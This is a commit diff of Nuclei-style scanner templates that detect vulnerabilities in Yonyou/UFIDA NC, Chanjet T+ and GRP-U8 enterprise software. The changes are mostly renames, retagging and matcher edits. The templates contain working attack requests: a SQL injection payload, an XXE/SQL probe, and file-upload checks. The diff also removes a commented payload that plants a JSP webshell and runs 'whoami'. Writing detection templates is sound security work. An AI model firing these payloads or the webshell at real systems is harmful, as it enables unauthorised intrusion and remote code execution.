updated-templates-p
parent
88153faaf8
commit
274c14e763
|
@ -1,11 +1,11 @@
|
||||||
id: yonyou-nc-uapjs-jsinvoke-fileupload
|
id: CNVD-C-2023-76801
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Yonyou NC uapjs jsinvoke 文件上传漏洞
|
name: UFIDA NC uapjs - RCE vulnerability
|
||||||
author: SleepingBag945
|
author: SleepingBag945
|
||||||
severity: critical
|
severity: critical
|
||||||
description: 用友NC 及 NCC系统存在任意方法调用漏洞,通过uapjs (jsinvoke)利用漏洞可调用危险方法造成攻击。
|
description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
|
||||||
tags: yonyou
|
tags: cvnd,cvnd2023,yonyou,rce
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -28,15 +28,3 @@ http:
|
||||||
- status_code_1 == 200
|
- status_code_1 == 200
|
||||||
- status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
|
- status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
|
||||||
# POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
|
|
||||||
# Host: {{Hostname}}
|
|
||||||
|
|
||||||
# {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}
|
|
||||||
|
|
||||||
|
|
||||||
# POST /cmdb.jsp?error=bsh.Interpreter HTTP/1.1
|
|
||||||
# Host: {{Hostname}}
|
|
||||||
|
|
||||||
# cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())
|
|
|
@ -10,7 +10,7 @@ info:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
fofa-query: app="ZyXEL-USG-FLEX"
|
fofa-query: app="ZyXEL-USG-FLEX"
|
||||||
verified: true
|
verified: true
|
||||||
tags: cve,cve2022,zyxel,auth-bypass
|
tags: cve,cve2022,zyxel,auth-bypass,router
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: SleepingBag945
|
author: SleepingBag945
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Changjietong Information Technology Co., Ltd. is a company dedicated to providing platform services, application services, and data value-added services with financial and management services as its core to China's small and micro enterprises. Changjietong Information Technology Co., Ltd. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
|
Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
|
||||||
reference: |
|
reference: |
|
||||||
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
|
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
|
||||||
metadata:
|
metadata:
|
||||||
|
@ -38,14 +38,8 @@ http:
|
||||||
part: body_1
|
part: body_1
|
||||||
words:
|
words:
|
||||||
- "{\"RetCode\":0}"
|
- "{\"RetCode\":0}"
|
||||||
condition: and
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body_2
|
part: body_2
|
||||||
words:
|
words:
|
||||||
- "{\"RetCode\":2}"
|
- "{\"RetCode\":2}"
|
||||||
condition: and
|
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
|
@ -28,6 +28,7 @@ http:
|
||||||
- "<configuration>"
|
- "<configuration>"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: status
|
- type: word
|
||||||
status:
|
part: header
|
||||||
- 200
|
words:
|
||||||
|
- "application/octet-stream"
|
|
@ -3,7 +3,7 @@ id: chanjet-tplus-fileupload
|
||||||
info:
|
info:
|
||||||
name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
|
name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
|
||||||
author: SleepingBag945
|
author: SleepingBag945
|
||||||
severity: critical
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
|
There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
|
||||||
reference:
|
reference:
|
||||||
|
|
|
@ -20,20 +20,15 @@ http:
|
||||||
POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
|
POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
Accept-Encoding: gzip
|
|
||||||
|
|
||||||
{"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""}
|
{"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- "0x06d49632c9dc9bcb62aeaef99612ba6b"
|
- "0x06d49632c9dc9bcb62aeaef99612ba6b"
|
||||||
- "Message\":\"245"
|
- "Message\":\"245"
|
||||||
- "DatabaseException"
|
- "DatabaseException"
|
||||||
part: body
|
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
|
@ -1,21 +0,0 @@
|
||||||
id: chanjetcrm-createsite-sqli
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Chanjetcrm - create_site SQL Injection
|
|
||||||
author: unknown
|
|
||||||
severity: critical
|
|
||||||
description: |
|
|
||||||
There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
|
|
||||||
reference:
|
|
||||||
- https://stack.chaitin.com/techblog/detail?id=10
|
|
||||||
tags: chanjetcrm,sqli
|
|
||||||
|
|
||||||
http:
|
|
||||||
- method: GET
|
|
||||||
path:
|
|
||||||
- "{{BaseURL}}/WebSer~1/create_site.php?site_id=1"
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
words:
|
|
||||||
- "register fail,please again"
|
|
||||||
part: body
|
|
|
@ -1,4 +1,4 @@
|
||||||
id: yonyou-nc-filereceiveservlet-fileupload
|
id: yonyou-filereceiveservlet-fileupload
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
|
name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
|
||||||
|
@ -12,7 +12,7 @@ info:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
fofa-query: app="用友-UFIDA-NC"
|
fofa-query: app="用友-UFIDA-NC"
|
||||||
verified: true
|
verified: true
|
||||||
tags: yonyou,nc,fileupload,intrusive
|
tags: yonyou,fileupload,intrusive
|
||||||
|
|
||||||
variables:
|
variables:
|
||||||
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
|
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
|
|
@ -1,10 +1,10 @@
|
||||||
id: yonyou-grp-u8-sqli
|
id: yonyou-grp-u8-xxe
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: yonyou-grp-u8-sqli
|
name: Yonyou UFIDA GRP-u8 - XXE
|
||||||
author: SleepingBag945
|
author: SleepingBag945
|
||||||
severity: critical
|
severity: critical
|
||||||
description: 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载外部SQL语句,以及命令执行
|
description: UFIDA GRP-u8 has an XXE vulnerability. This vulnerability is caused by the application not loading external entities when parsing XML input, resulting in the loading of external SQL statements and command execution.
|
||||||
reference:
|
reference:
|
||||||
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
|
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
|
||||||
tags: yonyou,grp,xxe,sqli
|
tags: yonyou,grp,xxe,sqli
|
||||||
|
@ -14,26 +14,17 @@ http:
|
||||||
- |
|
- |
|
||||||
POST /Proxy HTTP/1.1
|
POST /Proxy HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
|
|
||||||
Accept: */*
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Accept-Encoding: gzip
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
|
cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "1759837260"
|
- "1759837260"
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<R9PACKET>"
|
- "<R9PACKET>"
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
||||||
|
|
||||||
# 可尝试启动并调用xpcmdshell执行命令
|
|
|
@ -22,5 +22,5 @@ http:
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'status_code_1 == 200 && contains(body_1,"java.io")'
|
- 'status_code_1 == 200 && contains(body_1,"java.io") && contains(body_1,"EOFExceptionYI")'
|
||||||
condition: and
|
condition: and
|
|
@ -11,7 +11,7 @@ info:
|
||||||
metadata:
|
metadata:
|
||||||
fofa-query: icon_hash="1085941792"
|
fofa-query: icon_hash="1085941792"
|
||||||
verified: true
|
verified: true
|
||||||
tags: yonyou,nc,intrusive
|
tags: yonyou,intrusive,fileupload
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -13,7 +13,7 @@ info:
|
||||||
max-request: 2
|
max-request: 2
|
||||||
fofa-query: app="用友-UFIDA-NC
|
fofa-query: app="用友-UFIDA-NC
|
||||||
verified: true
|
verified: true
|
||||||
tags: yonyou,nc,intrusive
|
tags: yonyou,intrusive,ufida,fileupload
|
||||||
|
|
||||||
variables:
|
variables:
|
||||||
v1: "{{rand_int(1,100)}}"
|
v1: "{{rand_int(1,100)}}"
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
id: yonyou-nc-ncmessageservlet-rce
|
id: yonyou-nc-ncmessageservlet-rce
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: UFIDA NC NCMessageServlet - Deserialization RCE Detect
|
name: UFIDA NC NCMessageServlet - Deserialization RCE Detection
|
||||||
author: SleepingBag945
|
author: SleepingBag945
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
|
@ -12,7 +12,7 @@ info:
|
||||||
max-request: 2
|
max-request: 2
|
||||||
fofa-query: app="用友-UFIDA-NC
|
fofa-query: app="用友-UFIDA-NC
|
||||||
verified: true
|
verified: true
|
||||||
tags: yonyou,rce,deserialization,nc
|
tags: yonyou,rce,deserialization,rce
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
Loading…
Reference in New Issue